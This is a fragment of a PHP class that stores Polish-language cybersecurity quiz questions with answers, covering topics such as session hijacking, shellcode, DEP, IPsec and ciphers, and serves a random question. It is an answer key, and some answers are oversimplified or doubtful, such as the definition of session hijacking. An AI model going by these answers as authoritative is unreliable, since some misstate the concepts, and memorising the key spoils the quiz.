        ['id' => 190, 'question' => 'Session hijacking to atak polegający na czym?', 'answer' => 'Przejęciu sesji po dłuższym jej nieużywaniu przez użytkownika'],
        ['id' => 191, 'question' => 'Szyfr Vernama jest jedynym szyfrem, którego co?', 'answer' => 'Nie da się złamać'],
        ['id' => 192, 'question' => 'Jednym z efektów robaka Morrisa było co?', 'answer' => 'Powołanie CERT przez DARPA i powstanie zespołów CSIRT w różnych krajach i przedsiębiorstwach'],
        ['id' => 193, 'question' => 'IoC (Indicators of Compromise) to co?', 'answer' => 'Dane zwracane przez sandboxa dotyczące funkcji skrótów, domen itp.'],
        ['id' => 194, 'question' => 'Sposoby przeciwdziałania atakom typu injection to?', 'answer' => 'Unikanie bezpośredniego interpretowania danych, silna kontrola typów, walidacja parametrów'],
        ['id' => 195, 'question' => 'Usługa poufności realizowana jest przez co?', 'answer' => 'Szyfrowanie'],
        ['id' => 196, 'question' => 'Tryb CFB pozwala na zbudowanie z AES czego?', 'answer' => 'Szyfru strumieniowego'],
        ['id' => 197, 'question' => 'Credential stuffing polega na czym?', 'answer' => 'Wykorzystaniu wcześniej zdobytych kombinacji loginów i haseł do próby dostępu do kont na różnych serwisach'],
        ['id' => 198, 'question' => 'Procedura GetPC pomaga w czym?', 'answer' => 'Znalezieniu adresu w pamięci gdzie został zapisany exploit'],
        ['id' => 199, 'question' => 'Przy użyciu protokołów AH i ESP na każdym urządzeniu (serwera i klienta) znajdują się ile tablic SA?', 'answer' => 'Po cztery tablice SA'],
        ['id' => 200, 'question' => 'Po wykonaniu instrukcji call z kodu na stosie zostanie umieszczona jaka wartość?', 'answer' => 'Adres następnej instrukcji po call (adres powrotu)'],
        ['id' => 201, 'question' => 'Po wykonaniu instrukcji call rejestr EIP przyjmie jaką wartość?', 'answer' => 'Adres funkcji wywoływanej przez call'],
        ['id' => 202, 'question' => 'Pierwsza instrukcja shellcode-a - jak znaleźć jej adres?', 'answer' => 'Shellcode zaczyna się zaraz po adresie powrotu - trzeba odczytać z pamięci'],
        ['id' => 203, 'question' => 'DEP jest mechanizmem który zabezpiecza przed czym?', 'answer' => 'Wykonaniem danych na stosie'],
    ];

    /**
     * @return array{id: int, question: string}
     */
    public function handle(): array
    {
        $item = self::QUESTIONS[array_rand(self::QUESTIONS)];

        return [
            'id' => $item['id'],
            'question' => $item['question'],
        ];
    }
}
